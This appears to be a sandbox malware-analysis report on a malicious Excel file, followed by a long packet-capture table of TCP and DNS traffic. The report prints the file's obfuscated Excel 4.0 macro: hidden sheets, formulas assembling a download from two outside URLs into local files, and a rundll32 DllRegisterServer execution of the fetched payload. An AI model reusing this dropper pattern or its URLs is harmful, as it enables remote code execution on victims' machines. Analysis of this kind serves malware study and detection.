,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)",,,=BA17(),,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL29&Doc2!BL30,Doc3!AY10)=RAND()=FACT(59)=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY13&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW10)=SUMXMY2(452354,45245)",,,,,,"=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY14&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&""1""&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW11)",,,,,,=GOTO(Doc3!AW8),,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW14)",,,,,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&""1""&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW15)",,,,,,,,,,,,=BD4(),,,,,,,,,,,,,,,,,,,,,CALL,,,"=FORMULA(Doc2!BH20&Doc2!BI20&Doc2!BJ20&Doc2!BK20,Doc3!AY13)",,,,,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL32&Doc2!BJ31&Doc2!BL31&Doc2!BL34&Doc2!BJ32&""e""&""A"",Doc3!AY11)",,,,,,,,,,,,"=FORMULA(Doc2!BH21&Doc2!BI21&Doc2!BJ21&Doc2!BK21,Doc3!AY14)",,,,,,,,,,,,"=FORMULA(Doc2!BM34&Doc2!BM29&Doc2!BM30&Doc2!BM33,Doc3!AY12)",,,,,,=BG8(),,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,psq.com.mx/hDHqOp5,8UBQv/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,academy.haleemcampus.co,m/GxaCS5azoZlJ/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\flamo.vir,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\bubl.cmi,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,un,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",Dl",,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,lRegi,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ster,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Server,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,
Network Behavior |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 29, 2021 17:47:16.877285957 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.034804106 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.035001040 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.036274910 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.193631887 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.197438002 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.197491884 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.197526932 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.197642088 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.197695971 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.224020958 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.381622076 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:17.381784916 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.384398937 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:17.581867933 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216415882 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216470957 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216506958 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216523886 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216546059 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216559887 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216577053 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216587067 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216610909 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216625929 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.216738939 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.216801882 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.220726967 CEST | 49734 | 443 | 192.168.2.4 | 162.241.2.112 |
Jun 29, 2021 17:47:18.297157049 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.378248930 CEST | 443 | 49734 | 162.241.2.112 | 192.168.2.4 |
Jun 29, 2021 17:47:18.455751896 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.455862999 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.456981897 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.614711046 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615437031 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615483999 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615523100 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615549088 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.615612030 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.615669966 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.615679026 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.617918968 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.618040085 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.627181053 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.784462929 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:18.784598112 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.785315037 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:18.982614994 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.349277020 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.349569082 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.349670887 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.355262995 CEST | 49736 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.358287096 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.512012005 CEST | 443 | 49736 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.520284891 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.520704031 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.521374941 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.683280945 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.683936119 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:19.684093952 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.684843063 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.689727068 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:19.851730108 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.255176067 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.255325079 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.255598068 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.255672932 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.256743908 CEST | 49738 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.258877993 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.418549061 CEST | 443 | 49738 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.419622898 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.419821978 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.420542955 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.585305929 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.585884094 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:20.586049080 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.587156057 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.592771053 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:20.753871918 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.158571959 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.158694983 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.158785105 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.158839941 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.160494089 CEST | 49739 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.162003040 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.321614027 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.321721077 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.322243929 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.323024988 CEST | 443 | 49739 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.479310989 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.479876041 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:21.479964972 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.481251001 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.486433983 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:21.643575907 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:22.044697046 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:22.044873953 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:22.045356035 CEST | 443 | 49741 | 108.179.232.80 | 192.168.2.4 |
Jun 29, 2021 17:47:22.045507908 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
Jun 29, 2021 17:47:22.417372942 CEST | 49741 | 443 | 192.168.2.4 | 108.179.232.80 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 29, 2021 17:46:58.920005083 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:46:58.969975948 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:00.087795973 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:00.137931108 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:02.795377016 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:02.841855049 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:03.633344889 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:03.683186054 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:04.540199041 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:04.594928026 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:05.699049950 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:05.749738932 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:10.623648882 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:10.678422928 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:12.290111065 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:12.344947100 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:12.721546888 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:12.802370071 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:13.279201984 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:13.352468967 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:14.309581995 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:14.366941929 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:15.324779034 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:15.381751060 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:15.674053907 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:15.723820925 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:16.690315008 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:16.874973059 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:16.939909935 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:16.989156008 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:17.291711092 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:17.347352982 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:18.234659910 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:18.292426109 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:18.780397892 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:18.840291977 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:20.327342033 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:20.376887083 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:21.321446896 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:21.368891001 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:21.376266003 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:21.422806978 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:22.648659945 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:22.695760965 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:24.035027027 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:24.082155943 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:25.153997898 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:25.201874971 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:26.007030964 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:26.053354025 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:27.706262112 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:27.761327028 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:28.807010889 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:28.856395960 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:30.379142046 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:30.427225113 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:30.754729986 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:30.828135967 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:31.738715887 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:31.796335936 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:46.564105988 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:46.703835964 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:47.277631044 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:47.336808920 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:47.336930990 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:47.399616957 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:47.916399002 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:47.974071980 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:48.461107969 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:48.517076015 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:49.200185061 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 29, 2021 17:47:49.254686117 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Jun 29, 2021 17:47:50.200495958 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
